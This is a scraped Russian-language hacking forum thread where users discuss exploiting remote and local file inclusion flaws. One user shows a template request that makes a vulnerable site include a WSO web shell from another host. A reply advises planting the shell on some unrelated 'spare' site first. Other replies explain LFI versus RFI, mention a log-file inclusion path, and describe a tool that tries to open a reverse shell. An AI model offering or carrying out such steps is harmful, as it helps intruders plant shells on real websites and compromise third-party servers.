![]() |
httр://уязвимый-сайт/?переменная=http://сайт_где_у_нас.шелл/ну_и_сам.шелл
Если я shell залью на localhost то есть на свой сервер xampp (который стоит на пк) httр://уязвимый-сайт/?переменная=http://localhost/WSO.php Так подействует или нужен сайт с доменом ? .SpoilerTarget" type="button">Spoiler: Скриншот https://s8.hostingkartinok.com/uploa...fdf5538e78.png |
на локалхосте не подействует
найди какой-нибудь левый шелл ненужный и туда залей , оттуда уже дернешь напрямую/ Но это надо чтобы было RFI |
Цитата:
|
на скрине у тебя LFI а не RFI http://insafety.org/lfi.php
локальный инклуд означает, что есть возможность подключать и исполнять или читать файлы только в пределах уязвимого сервера по относительному пути к файлам (а точнее в пределах заданной в конфиге php open_basedir, ибо она ограничивает доступные интерпретатору каталоги). При удалённом инклуде есть возможность подключать произвольные файлы с других серверов по их URL-адресам. RFI встречается гораздо реже, чем LFI и считается более опасной уязвимостью. |
Цитата:
|
Цитата:
|
|
Цитата:
.SpoilerTarget" type="button">Spoiler: Фото https://s8.hostingkartinok.com/uploa...ff8c2aaa5b.png |
Цитата:
http://www.site.ru/search?q=/usr/loc...ogs/access_log И ещё не до конца понимаю что значит 1) Exploiter 2) Scanner типа 1 это эксплуатация, а 2 это сканер |
Exploiter пробует установить reverse shell
По поводу линка, высокая вероятность ложного срабатывания, т.к запрос идет поиск search?q= и сканеры очень часто пишут что возможно LFI ,но на деле не так |
| Время: 02:26 |